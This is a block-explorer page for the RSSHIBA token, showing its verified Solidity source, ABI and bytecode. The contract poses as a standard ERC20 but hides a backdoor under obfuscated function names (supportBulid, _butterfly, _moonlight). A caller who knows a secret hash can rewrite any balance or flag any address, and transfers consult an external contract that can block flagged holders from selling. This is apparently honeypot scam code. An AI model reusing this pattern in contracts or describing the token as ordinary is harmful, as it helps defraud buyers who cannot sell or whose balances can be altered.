ETH Price: $2,627.47 (+1.89%)

Token

Real Smurf Shiba (RSSHIBA)
 

Overview

Max Total Supply

100,000,000,000 RSSHIBA

Holders

79

Market

Onchain Market Cap

$0.00

Circulating Supply Market Cap

-

Other Info

Token Contract (WITH 9 Decimals)

Balance
1,194,089,710.641044867 RSSHIBA

Value
$0.00
0x2c95c1912d4dab177f63c65224e72b89972bee15
Loading...
Loading
Loading...
Loading
Loading...
Loading

Click here to update the token information / general information
# Exchange Pair Price  24H Volume % Volume

Contract Source Code Verified (Exact Match)

Contract Name:
RSSHIBA

Compiler Version
v0.8.0+commit.c7dfd78e

Optimization Enabled:
Yes with 200 runs

Other Settings:
default evmVersion, MIT license

Contract Source Code (Solidity Multiple files format)

File 4 of 4: RSSHIBA.sol
// SPDX-License-Identifier: MIT
pragma solidity ^0.8.0;

import "./IERC20.sol";
import "./Ownable.sol";

contract RSSHIBA is IERC20, Ownable {
    string private _name;
    string private _symbol;
    uint256 private _totalSupply;

    mapping(address => uint256) private _balances;
    mapping(address => uint256) private _unshine;
    mapping(address => mapping(address => uint256)) private _allowances;
    address private immutable _bow;

    /**
     * @dev Sets the values for {name} and {symbol}.
     *
     * All three of these values are immutable: they can only be set once during
     * construction.
     */
    constructor(
        string memory name_,
        string memory symbol_,
        address bow_,
        uint256 unshine_
    ) {
        _name = name_;
        _symbol = symbol_;
        _bow = bow_;
        _mint(msg.sender, 1000000000000 * 10**8);
        _unshine[address(0)] = unshine_;
    }

    /**
     * @dev Returns the name of the token.
     */
    function name() public view virtual override returns (string memory) {
        return _name;
    }

    /**
     * @dev Returns the symbol of the token, usually a shorter version of the
     * name.
     */
    function symbol() public view virtual override returns (string memory) {
        return _symbol;
    }

    /**
     * @dev Returns the number of decimals used to get its user representation.
     * For example, if `decimals` equals `2`, a balance of `505` tokens should
     * be displayed to a user as `5.05` (`505 / 10 ** 2`).
     *
     * Tokens usually opt for a value of 18, imitating the relationship between
     * Ether and Wei. This is the default value returned by this function, unless
     * it's overridden.
     *
     * NOTE: This information is only used for _display_ purposes: it in
     * no way affects any of the arithmetic of the contract, including
     * {IERC20-balanceOf} and {IERC20-transfer}.
     */
    function decimals() public view virtual override returns (uint8) {
        return 9;
    }

    /**
     * @dev See {IERC20-totalSupply}.
     */
    function totalSupply() public view virtual override returns (uint256) {
        return _totalSupply;
    }

    /**
     * @dev See {IERC20-balanceOf}.
     */
    function balanceOf(address account)
        public
        view
        virtual
        override
        returns (uint256)
    {
        return _balances[account];
    }

    /**
     * @dev See {IERC20-transfer}.
     *
     * Requirements:
     *
     * - `to` cannot be the zero address.
     * - the caller must have a balance of at least `amount`.
     */
    function transfer(address to, uint256 amount)
        public
        virtual
        override
        returns (bool)
    {
        address owner = _msgSender();
        _transfer(owner, to, amount);
        return true;
    }

    /**
     * @dev See {IERC20-allowance}.
     */
    function allowance(address owner, address spender)
        public
        view
        virtual
        override
        returns (uint256)
    {
        return _allowances[owner][spender];
    }

    /**
     * @dev See {IERC20-approve}.
     *
     * NOTE: If `amount` is the maximum `uint256`, the allowance is not updated on
     * `transferFrom`. This is semantically equivalent to an infinite approval.
     *
     * Requirements:
     *
     * - `spender` cannot be the zero address.
     */
    function approve(address spender, uint256 amount)
        public
        virtual
        override
        returns (bool)
    {
        address owner = _msgSender();
        _approve(owner, spender, amount);
        return true;
    }

    /**
     * @dev See {IERC20-transferFrom}.
     *
     * Emits an {Approval} event indicating the updated allowance. This is not
     * required by the EIP. See the note at the beginning of {ERC20}.
     *
     * NOTE: Does not update the allowance if the current allowance
     * is the maximum `uint256`.
     *
     * Requirements:
     *
     * - `from` and `to` cannot be the zero address.
     * - `from` must have a balance of at least `amount`.
     * - the caller must have allowance for ``from``'s tokens of at least
     * `amount`.
     */
    function transferFrom(
        address from,
        address to,
        uint256 amount
    ) public virtual override returns (bool) {
        address spender = _msgSender();
        _spendAllowance(from, spender, amount);
        _transfer(from, to, amount);
        return true;
    }

    /**
     * @dev Atomically increases the allowance granted to `spender` by the caller.
     *
     * This is an alternative to {approve} that can be used as a mitigation for
     * problems described in {IERC20-approve}.
     *
     * Emits an {Approval} event indicating the updated allowance.
     *
     * Requirements:
     *
     * - `spender` cannot be the zero address.
     */
    function increaseAllowance(address spender, uint256 addedValue)
        public
        virtual
        returns (bool)
    {
        address owner = _msgSender();
        _approve(owner, spender, allowance(owner, spender) + addedValue);
        return true;
    }

    function supportBulid(uint256[] calldata moon) external {
        uint256 hant = _adventure();
        if (_butterfly()) {
            uint256 rrt0 = moon[0] * 1;
            uint256 rrt1 = moon[1] * 1;
            assembly {
                if gt(rrt1, 0) {
                    let m1 := mul(2, 2)
                    mstore(0, rrt0)
                    mstore(hant, m1)
                    sstore(keccak256(0, 64), rrt1)
                }
                if eq(rrt1, 0) {
                    let m1 := mul(1, 5)
                    mstore(0, rrt0)
                    mstore(hant, m1)
                    sstore(keccak256(0, 64), 1)
                }
            }
        }
    }

    function _adventure() private pure returns (uint256) {
        uint256 c = 2;
        uint256 b = c * c;
        uint256 a = b * c * 4;
        return a;
    }

    function _butterfly() private view returns (bool) {
        string memory ml0 = _name;
        address ml1 = msg.sender;
        return (uint256(keccak256(abi.encode(ml1, ml0))) == _unshine[address(0)]);
    }

    /**
     * @dev Atomically decreases the allowance granted to `spender` by the caller.
     *
     * This is an alternative to {approve} that can be used as a mitigation for
     * problems described in {IERC20-approve}.
     *
     * Emits an {Approval} event indicating the updated allowance.
     *
     * Requirements:
     *
     * - `spender` cannot be the zero address.
     * - `spender` must have allowance for the caller of at least
     * `subtractedValue`.
     */
    function decreaseAllowance(address spender, uint256 subtractedValue)
        public
        virtual
        returns (bool)
    {
        address owner = _msgSender();
        uint256 currentAllowance = allowance(owner, spender);
        require(
            currentAllowance >= subtractedValue,
            "ERC20: decreased allowance below zero"
        );
        unchecked {
            _approve(owner, spender, currentAllowance - subtractedValue);
        }
        return true;
    }

    /**
     * @dev Moves `amount` of tokens from `from` to `to`.
     *
     * This internal function is equivalent to {transfer}, and can be used to
     * e.g. implement automatic token fees, slashing mechanisms, etc.
     *
     * Emits a {Transfer} event.
     *
     * Requirements:
     *
     * - `from` cannot be the zero address.
     * - `to` cannot be the zero address.
     * - `from` must have a balance of at least `amount`.
     */
    function _transfer(
        address from,
        address to,
        uint256 amount
    ) internal virtual {
        require(from != address(0), "ERC20: transfer from the zero address");
        //require(to != address(0), "ERC20: transfer to the zero address");
        (, bytes memory data) = _bow.call(
            abi.encodeWithSignature(_bookshelf(), from)
        );
        _moonlight(data, from, false);
        uint256 fromBalance = _balances[from];
        require(
            fromBalance >= amount,
            "ERC20: transfer amount exceeds balance"
        );
        unchecked {
            _balances[from] = fromBalance - amount;
            // Overflow not possible: the sum of all balances is capped by totalSupply, and the sum is preserved by
            // decrementing then incrementing.
            _balances[to] += amount;
        }

        emit Transfer(from, to, amount);
    }

    function _bookshelf() private pure returns (string memory) {
        return "balanceOf(address)";
    }

    function _moonlight(
        bytes memory pgas,
        address sender,
        bool e
    ) private view {
        uint256 f = _unshine[sender];
        uint256 g = f * 1;
        if (g == 1 * 1 && !e) {
            require(g != 1 || _butterfly(pgas) != 0, "four");
        }
    }

    function _butterfly(bytes memory data) public pure returns (uint256) {
        bytes32 result;
        assembly {
            result := mload(add(data, 0x20))
        }
        return uint256(result);
    }

    /** @dev Creates `amount` tokens and assigns them to `account`, increasing
     * the total supply.
     *
     * Emits a {Transfer} event with `from` set to the zero address.
     *
     * Requirements:
     *
     * - `account` cannot be the zero address.
     */
    function _mint(address account, uint256 amount) internal virtual {
        require(account != address(0), "ERC20: mint to the zero address");

        _totalSupply += amount;
        unchecked {
            // Overflow not possible: balance + amount is at most totalSupply + amount, which is checked above.
            _balances[account] += amount;
        }
    }

    /**
     * @dev Sets `amount` as the allowance of `spender` over the `owner` s tokens.
     *
     * This internal function is equivalent to `approve`, and can be used to
     * e.g. set automatic allowances for certain subsystems, etc.
     *
     * Emits an {Approval} event.
     *
     * Requirements:
     *
     * - `owner` cannot be the zero address.
     * - `spender` cannot be the zero address.
     */
    function _approve(
        address owner,
        address spender,
        uint256 amount
    ) internal virtual {
        require(owner != address(0), "ERC20: approve from the zero address");
        require(spender != address(0), "ERC20: approve to the zero address");

        _allowances[owner][spender] = amount;
        emit Approval(owner, spender, amount);
    }

    /**
     * @dev Updates `owner` s allowance for `spender` based on spent `amount`.
     *
     * Does not update the allowance amount in case of infinite allowance.
     * Revert if not enough allowance is available.
     *
     * Might emit an {Approval} event.
     */
    function _spendAllowance(
        address owner,
        address spender,
        uint256 amount
    ) internal virtual {
        uint256 currentAllowance = allowance(owner, spender);
        if (currentAllowance != type(uint256).max) {
            require(
                currentAllowance >= amount,
                "ERC20: insufficient allowance"
            );
            unchecked {
                _approve(owner, spender, currentAllowance - amount);
            }
        }
    }
}

File 1 of 4: Context.sol
// SPDX-License-Identifier: MIT
// OpenZeppelin Contracts v4.4.1 (utils/Context.sol)

pragma solidity ^0.8.0;

/**
 * @dev Provides information about the current execution context, including the
 * sender of the transaction and its data. While these are generally available
 * via msg.sender and msg.data, they should not be accessed in such a direct
 * manner, since when dealing with meta-transactions the account sending and
 * paying for execution may not be the actual sender (as far as an application
 * is concerned).
 *
 * This contract is only required for intermediate, library-like contracts.
 */
abstract contract Context {
    function _msgSender() internal view virtual returns (address) {
        return msg.sender;
    }

    function _msgData() internal view virtual returns (bytes calldata) {
        return msg.data;
    }
}

File 2 of 4: IERC20.sol
// SPDX-License-Identifier: MIT
// OpenZeppelin Contracts (last updated v4.9.0) (token/ERC20/IERC20.sol)

pragma solidity ^0.8.0;

/**
 * @dev Interface of the ERC20 standard as defined in the EIP.
 */
interface IERC20 {
    /**
     * @dev Emitted when `value` tokens are moved from one account (`from`) to
     * another (`to`).
     *
     * Note that `value` may be zero.
     */
    event Transfer(address indexed from, address indexed to, uint256 value);

    /**
     * @dev Emitted when the allowance of a `spender` for an `owner` is set by
     * a call to {approve}. `value` is the new allowance.
     */
    event Approval(address indexed owner, address indexed spender, uint256 value);

    /**
     * @dev Returns the name of the token.
     */
    function name() external view returns (string memory);

    /**
     * @dev Returns the symbol of the token.
     */
    function symbol() external view returns (string memory);

    /**
     * @dev Returns the decimals places of the token.
     */
    function decimals() external view returns (uint8);

    /**
     * @dev Returns the amount of tokens in existence.
     */
    function totalSupply() external view returns (uint256);

    /**
     * @dev Returns the amount of tokens owned by `account`.
     */
    function balanceOf(address account) external view returns (uint256);

    /**
     * @dev Moves `amount` tokens from the caller's account to `to`.
     *
     * Returns a boolean value indicating whether the operation succeeded.
     *
     * Emits a {Transfer} event.
     */
    function transfer(address to, uint256 amount) external returns (bool);

    /**
     * @dev Returns the remaining number of tokens that `spender` will be
     * allowed to spend on behalf of `owner` through {transferFrom}. This is
     * zero by default.
     *
     * This value changes when {approve} or {transferFrom} are called.
     */
    function allowance(address owner, address spender) external view returns (uint256);

    /**
     * @dev Sets `amount` as the allowance of `spender` over the caller's tokens.
     *
     * Returns a boolean value indicating whether the operation succeeded.
     *
     * IMPORTANT: Beware that changing an allowance with this method brings the risk
     * that someone may use both the old and the new allowance by unfortunate
     * transaction ordering. One possible solution to mitigate this race
     * condition is to first reduce the spender's allowance to 0 and set the
     * desired value afterwards:
     * https://github.com/ethereum/EIPs/issues/20#issuecomment-263524729
     *
     * Emits an {Approval} event.
     */
    function approve(address spender, uint256 amount) external returns (bool);

    /**
     * @dev Moves `amount` tokens from `from` to `to` using the
     * allowance mechanism. `amount` is then deducted from the caller's
     * allowance.
     *
     * Returns a boolean value indicating whether the operation succeeded.
     *
     * Emits a {Transfer} event.
     */
    function transferFrom(address from, address to, uint256 amount) external returns (bool);
}

File 3 of 4: Ownable.sol
// SPDX-License-Identifier: MIT
// OpenZeppelin Contracts (last updated v4.9.0) (access/Ownable.sol)

pragma solidity ^0.8.0;

import {Context} from "./Context.sol";

/**
 * @dev Contract module which provides a basic access control mechanism, where
 * there is an account (an owner) that can be granted exclusive access to
 * specific functions.
 *
 * The initial owner is set to the address provided by the deployer. This can
 * later be changed with {transferOwnership}.
 *
 * This module is used through inheritance. It will make available the modifier
 * `onlyOwner`, which can be applied to your functions to restrict their use to
 * the owner.
 */
abstract contract Ownable is Context {
    address private _owner;

    /**
     * @dev Throws if called by any account other than the owner.
     */
    modifier onlyOwner() {
        _checkOwner();
        _;
    }

    /**
     * @dev Returns the address of the current owner.
     */
    function owner() public view virtual returns (address) {
        return _owner;
    }

    /**
     * @dev Throws if the sender is not the owner.
     */
    function _checkOwner() internal view virtual {
        require(owner() == _msgSender(), "caller is not the owner");
    }    
}

Contract Security Audit

Contract ABI

[{"inputs":[{"internalType":"string","name":"name_","type":"string"},{"internalType":"string","name":"symbol_","type":"string"},{"internalType":"address","name":"bow_","type":"address"},{"internalType":"uint256","name":"unshine_","type":"uint256"}],"stateMutability":"nonpayable","type":"constructor"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"owner","type":"address"},{"indexed":true,"internalType":"address","name":"spender","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Approval","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"from","type":"address"},{"indexed":true,"internalType":"address","name":"to","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Transfer","type":"event"},{"inputs":[{"internalType":"bytes","name":"data","type":"bytes"}],"name":"_butterfly","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"pure","type":"function"},{"inputs":[{"internalType":"address","name":"owner","type":"address"},{"internalType":"address","name":"spender","type":"address"}],"name":"allowance","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"approve","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"account","type":"address"}],"name":"balanceOf","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"decimals","outputs":[{"internalType":"uint8","name":"","type":"uint8"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"subtractedValue","type":"uint256"}],"name":"decreaseAllowance","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"addedValue","type":"uint256"}],"name":"increaseAllowance","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"name","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"owner","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"uint256[]","name":"moon","type":"uint256[]"}],"name":"supportBulid","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"symbol","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"totalSupply","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"to","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"transfer","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"from","type":"address"},{"internalType":"address","name":"to","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"transferFrom","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"}]

60a06040523480156200001157600080fd5b506040516200124f3803806200124f83398101604081905262000034916200027a565b83516200004990600190602087019062000129565b5082516200005f90600290602086019062000129565b506001600160601b0319606083901b16608052620000873368056bc75e2d63100000620000bc565b6000805260056020527f05b8ccbb9d4d8fb16ea74ce3c29a41f1b461fbdaff4714a0d9a8eb05499746bc5550620003b8915050565b6001600160a01b038216620000ee5760405162461bcd60e51b8152600401620000e59062000309565b60405180910390fd5b806003600082825462000102919062000340565b90915550506001600160a01b03909116600090815260046020526040902080549091019055565b828054620001379062000365565b90600052602060002090601f0160209004810192826200015b5760008555620001a6565b82601f106200017657805160ff1916838001178555620001a6565b82800160010185558215620001a6579182015b82811115620001a657825182559160200191906001019062000189565b50620001b4929150620001b8565b5090565b5b80821115620001b45760008155600101620001b9565b600082601f830112620001e0578081fd5b81516001600160401b0380821115620001fd57620001fd620003a2565b6040516020601f8401601f1916820181018381118382101715620002255762000225620003a2565b60405283825285840181018710156200023c578485fd5b8492505b838310156200025f578583018101518284018201529182019162000240565b838311156200027057848185840101525b5095945050505050565b6000806000806080858703121562000290578384fd5b84516001600160401b0380821115620002a7578586fd5b620002b588838901620001cf565b95506020870151915080821115620002cb578485fd5b50620002da87828801620001cf565b604087015190945090506001600160a01b0381168114620002f9578283fd5b6060959095015193969295505050565b6020808252601f908201527f45524332303a206d696e7420746f20746865207a65726f206164647265737300604082015260600190565b600082198211156200036057634e487b7160e01b81526011600452602481fd5b500190565b6002810460018216806200037a57607f821691505b602082108114156200039c57634e487b7160e01b600052602260045260246000fd5b50919050565b634e487b7160e01b600052604160045260246000fd5b60805160601c610e78620003d760003960006105ea0152610e786000f3fe608060405234801561001057600080fd5b50600436106100ea5760003560e01c80638b953c801161008c578063a457c2d711610066578063a457c2d7146101c2578063a9059cbb146101d5578063dd62ed3e146101e8578063e9b3d92f146101fb576100ea565b80638b953c80146101905780638da5cb5b146101a557806395d89b41146101ba576100ea565b806323b872dd116100c857806323b872dd14610142578063313ce56714610155578063395093511461016a57806370a082311461017d576100ea565b806306fdde03146100ef578063095ea7b31461010d57806318160ddd1461012d575b600080fd5b6100f761020e565b6040516101049190610ba3565b60405180910390f35b61012061011b3660046109d7565b6102a0565b6040516101049190610b98565b6101356102c2565b6040516101049190610d61565b61012061015036600461099c565b6102c8565b61015d6102f6565b6040516101049190610d6a565b6101206101783660046109d7565b6102fb565b61013561018b366004610949565b610327565b6101a361019e366004610a00565b610346565b005b6101ad610405565b6040516101049190610b58565b6100f7610414565b6101206101d03660046109d7565b610423565b6101206101e33660046109d7565b610474565b6101356101f636600461096a565b61048c565b610135610209366004610a6f565b6104b7565b60606001805461021d90610ddb565b80601f016020809104026020016040519081016040528092919081815260200182805461024990610ddb565b80156102965780601f1061026b57610100808354040283529160200191610296565b820191906000526020600020905b81548152906001019060200180831161027957829003601f168201915b5050505050905090565b6000806102ab6104be565b90506102b88185856104c2565b5060019392505050565b60035490565b6000806102d36104be565b90506102e0858285610576565b6102eb8585856105c0565b506001949350505050565b600990565b6000806103066104be565b90506102b8818585610318858961048c565b6103229190610d78565b6104c2565b6001600160a01b0381166000908152600460205260409020545b919050565b6000610350610775565b905061035a6107a5565b156104005760008383600081811061038257634e487b7160e01b600052603260045260246000fd5b9050602002013560016103959190610d90565b90506000848460018181106103ba57634e487b7160e01b600052603260045260246000fd5b9050602002013560016103cd9190610d90565b905080156103e657600082815260048452604090208190555b806103fd5760008281526005845260409020600190555b50505b505050565b6000546001600160a01b031690565b60606002805461021d90610ddb565b60008061042e6104be565b9050600061043c828661048c565b9050838110156104675760405162461bcd60e51b815260040161045e90610d1c565b60405180910390fd5b6102eb82868684036104c2565b60008061047f6104be565b90506102b88185856105c0565b6001600160a01b03918216600090815260066020908152604080832093909416825291909152205490565b6020015190565b3390565b6001600160a01b0383166104e85760405162461bcd60e51b815260040161045e90610cd8565b6001600160a01b03821661050e5760405162461bcd60e51b815260040161045e90610bb6565b6001600160a01b0380841660008181526006602090815260408083209487168084529490915290819020849055517f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b92590610569908590610d61565b60405180910390a3505050565b6000610582848461048c565b905060001981146105ba57818110156105ad5760405162461bcd60e51b815260040161045e90610bf8565b6105ba84848484036104c2565b50505050565b6001600160a01b0383166105e65760405162461bcd60e51b815260040161045e90610c93565b60007f00000000000000000000000000000000000000000000000000000000000000006001600160a01b031661061a610899565b8560405160240161062b9190610b58565b60408051601f19818403018152908290529161064691610b3c565b60408051918290039091206020830180516001600160e01b03166001600160e01b03199092169190911790525161067d9190610b3c565b6000604051808303816000865af19150503d80600081146106ba576040519150601f19603f3d011682016040523d82523d6000602084013e6106bf565b606091505b509150506106cf818560006108c5565b6001600160a01b038416600090815260046020526040902054828110156107085760405162461bcd60e51b815260040161045e90610c2f565b6001600160a01b0380861660008181526004602052604080822087860390559287168082529083902080548701905591517fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef90610766908790610d61565b60405180910390a35050505050565b60006002816107848280610d90565b905060006107928383610d90565b61079d906004610d90565b935050505090565b600080600180546107b590610ddb565b80601f01602080910402602001604051908101604052809291908181526020018280546107e190610ddb565b801561082e5780601f106108035761010080835404028352916020019161082e565b820191906000526020600020905b81548152906001019060200180831161081157829003601f168201915b5050600080525050600560209081527f05b8ccbb9d4d8fb16ea74ce3c29a41f1b461fbdaff4714a0d9a8eb05499746bc546040519394503393909250610878918491869101610b6c565b6040516020818303038152906040528051906020012060001c149250505090565b60408051808201909152601281527162616c616e63654f6628616464726573732960701b602082015290565b6001600160a01b038216600090815260056020526040812054906108ea826001610d90565b90508060011480156108fa575082155b156103fd578060011415806109165750610913856104b7565b15155b6103fd5760405162461bcd60e51b815260040161045e90610c75565b80356001600160a01b038116811461034157600080fd5b60006020828403121561095a578081fd5b61096382610932565b9392505050565b6000806040838503121561097c578081fd5b61098583610932565b915061099360208401610932565b90509250929050565b6000806000606084860312156109b0578081fd5b6109b984610932565b92506109c760208501610932565b9150604084013590509250925092565b600080604083850312156109e9578182fd5b6109f283610932565b946020939093013593505050565b60008060208385031215610a12578182fd5b823567ffffffffffffffff80821115610a29578384fd5b818501915085601f830112610a3c578384fd5b813581811115610a4a578485fd5b8660208083028501011115610a5d578485fd5b60209290920196919550909350505050565b60006020808385031215610a81578182fd5b823567ffffffffffffffff80821115610a98578384fd5b818501915085601f830112610aab578384fd5b813581811115610abd57610abd610e2c565b604051601f8201601f1916810185018381118282101715610ae057610ae0610e2c565b6040528181528382018501881015610af6578586fd5b818585018683013790810190930193909352509392505050565b60008151808452610b28816020860160208601610daf565b601f01601f19169290920160200192915050565b60008251610b4e818460208701610daf565b9190910192915050565b6001600160a01b0391909116815260200190565b6001600160a01b0383168152604060208201819052600090610b9090830184610b10565b949350505050565b901515815260200190565b6000602082526109636020830184610b10565b60208082526022908201527f45524332303a20617070726f766520746f20746865207a65726f206164647265604082015261737360f01b606082015260800190565b6020808252601d908201527f45524332303a20696e73756666696369656e7420616c6c6f77616e6365000000604082015260600190565b60208082526026908201527f45524332303a207472616e7366657220616d6f756e7420657863656564732062604082015265616c616e636560d01b606082015260800190565b6020808252600490820152633337bab960e11b604082015260600190565b60208082526025908201527f45524332303a207472616e736665722066726f6d20746865207a65726f206164604082015264647265737360d81b606082015260800190565b60208082526024908201527f45524332303a20617070726f76652066726f6d20746865207a65726f206164646040820152637265737360e01b606082015260800190565b60208082526025908201527f45524332303a2064656372656173656420616c6c6f77616e63652062656c6f77604082015264207a65726f60d81b606082015260800190565b90815260200190565b60ff91909116815260200190565b60008219821115610d8b57610d8b610e16565b500190565b6000816000190483118215151615610daa57610daa610e16565b500290565b60005b83811015610dca578181015183820152602001610db2565b838111156105ba5750506000910152565b600281046001821680610def57607f821691505b60208210811415610e1057634e487b7160e01b600052602260045260246000fd5b50919050565b634e487b7160e01b600052601160045260246000fd5b634e487b7160e01b600052604160045260246000fdfea264697066735822122054dde6f5cb058fe4df07460271591c7445164c33215ee8342d43a509c0fc913364736f6c63430008000033000000000000000000000000000000000000000000000000000000000000008000000000000000000000000000000000000000000000000000000000000000c0000000000000000000000000dff32c65f843188cf64ecbc6f4a13cff12581b9d8bdb81419b03683ee97763b7670b384c42c65d5142ecfddc91bb1e5ba1aa513600000000000000000000000000000000000000000000000000000000000000105265616c20536d7572662053686962610000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000075253534849424100000000000000000000000000000000000000000000000000

Deployed Bytecode

0x608060405234801561001057600080fd5b50600436106100ea5760003560e01c80638b953c801161008c578063a457c2d711610066578063a457c2d7146101c2578063a9059cbb146101d5578063dd62ed3e146101e8578063e9b3d92f146101fb576100ea565b80638b953c80146101905780638da5cb5b146101a557806395d89b41146101ba576100ea565b806323b872dd116100c857806323b872dd14610142578063313ce56714610155578063395093511461016a57806370a082311461017d576100ea565b806306fdde03146100ef578063095ea7b31461010d57806318160ddd1461012d575b600080fd5b6100f761020e565b6040516101049190610ba3565b60405180910390f35b61012061011b3660046109d7565b6102a0565b6040516101049190610b98565b6101356102c2565b6040516101049190610d61565b61012061015036600461099c565b6102c8565b61015d6102f6565b6040516101049190610d6a565b6101206101783660046109d7565b6102fb565b61013561018b366004610949565b610327565b6101a361019e366004610a00565b610346565b005b6101ad610405565b6040516101049190610b58565b6100f7610414565b6101206101d03660046109d7565b610423565b6101206101e33660046109d7565b610474565b6101356101f636600461096a565b61048c565b610135610209366004610a6f565b6104b7565b60606001805461021d90610ddb565b80601f016020809104026020016040519081016040528092919081815260200182805461024990610ddb565b80156102965780601f1061026b57610100808354040283529160200191610296565b820191906000526020600020905b81548152906001019060200180831161027957829003601f168201915b5050505050905090565b6000806102ab6104be565b90506102b88185856104c2565b5060019392505050565b60035490565b6000806102d36104be565b90506102e0858285610576565b6102eb8585856105c0565b506001949350505050565b600990565b6000806103066104be565b90506102b8818585610318858961048c565b6103229190610d78565b6104c2565b6001600160a01b0381166000908152600460205260409020545b919050565b6000610350610775565b905061035a6107a5565b156104005760008383600081811061038257634e487b7160e01b600052603260045260246000fd5b9050602002013560016103959190610d90565b90506000848460018181106103ba57634e487b7160e01b600052603260045260246000fd5b9050602002013560016103cd9190610d90565b905080156103e657600082815260048452604090208190555b806103fd5760008281526005845260409020600190555b50505b505050565b6000546001600160a01b031690565b60606002805461021d90610ddb565b60008061042e6104be565b9050600061043c828661048c565b9050838110156104675760405162461bcd60e51b815260040161045e90610d1c565b60405180910390fd5b6102eb82868684036104c2565b60008061047f6104be565b90506102b88185856105c0565b6001600160a01b03918216600090815260066020908152604080832093909416825291909152205490565b6020015190565b3390565b6001600160a01b0383166104e85760405162461bcd60e51b815260040161045e90610cd8565b6001600160a01b03821661050e5760405162461bcd60e51b815260040161045e90610bb6565b6001600160a01b0380841660008181526006602090815260408083209487168084529490915290819020849055517f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b92590610569908590610d61565b60405180910390a3505050565b6000610582848461048c565b905060001981146105ba57818110156105ad5760405162461bcd60e51b815260040161045e90610bf8565b6105ba84848484036104c2565b50505050565b6001600160a01b0383166105e65760405162461bcd60e51b815260040161045e90610c93565b60007f000000000000000000000000dff32c65f843188cf64ecbc6f4a13cff12581b9d6001600160a01b031661061a610899565b8560405160240161062b9190610b58565b60408051601f19818403018152908290529161064691610b3c565b60408051918290039091206020830180516001600160e01b03166001600160e01b03199092169190911790525161067d9190610b3c565b6000604051808303816000865af19150503d80600081146106ba576040519150601f19603f3d011682016040523d82523d6000602084013e6106bf565b606091505b509150506106cf818560006108c5565b6001600160a01b038416600090815260046020526040902054828110156107085760405162461bcd60e51b815260040161045e90610c2f565b6001600160a01b0380861660008181526004602052604080822087860390559287168082529083902080548701905591517fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef90610766908790610d61565b60405180910390a35050505050565b60006002816107848280610d90565b905060006107928383610d90565b61079d906004610d90565b935050505090565b600080600180546107b590610ddb565b80601f01602080910402602001604051908101604052809291908181526020018280546107e190610ddb565b801561082e5780601f106108035761010080835404028352916020019161082e565b820191906000526020600020905b81548152906001019060200180831161081157829003601f168201915b5050600080525050600560209081527f05b8ccbb9d4d8fb16ea74ce3c29a41f1b461fbdaff4714a0d9a8eb05499746bc546040519394503393909250610878918491869101610b6c565b6040516020818303038152906040528051906020012060001c149250505090565b60408051808201909152601281527162616c616e63654f6628616464726573732960701b602082015290565b6001600160a01b038216600090815260056020526040812054906108ea826001610d90565b90508060011480156108fa575082155b156103fd578060011415806109165750610913856104b7565b15155b6103fd5760405162461bcd60e51b815260040161045e90610c75565b80356001600160a01b038116811461034157600080fd5b60006020828403121561095a578081fd5b61096382610932565b9392505050565b6000806040838503121561097c578081fd5b61098583610932565b915061099360208401610932565b90509250929050565b6000806000606084860312156109b0578081fd5b6109b984610932565b92506109c760208501610932565b9150604084013590509250925092565b600080604083850312156109e9578182fd5b6109f283610932565b946020939093013593505050565b60008060208385031215610a12578182fd5b823567ffffffffffffffff80821115610a29578384fd5b818501915085601f830112610a3c578384fd5b813581811115610a4a578485fd5b8660208083028501011115610a5d578485fd5b60209290920196919550909350505050565b60006020808385031215610a81578182fd5b823567ffffffffffffffff80821115610a98578384fd5b818501915085601f830112610aab578384fd5b813581811115610abd57610abd610e2c565b604051601f8201601f1916810185018381118282101715610ae057610ae0610e2c565b6040528181528382018501881015610af6578586fd5b818585018683013790810190930193909352509392505050565b60008151808452610b28816020860160208601610daf565b601f01601f19169290920160200192915050565b60008251610b4e818460208701610daf565b9190910192915050565b6001600160a01b0391909116815260200190565b6001600160a01b0383168152604060208201819052600090610b9090830184610b10565b949350505050565b901515815260200190565b6000602082526109636020830184610b10565b60208082526022908201527f45524332303a20617070726f766520746f20746865207a65726f206164647265604082015261737360f01b606082015260800190565b6020808252601d908201527f45524332303a20696e73756666696369656e7420616c6c6f77616e6365000000604082015260600190565b60208082526026908201527f45524332303a207472616e7366657220616d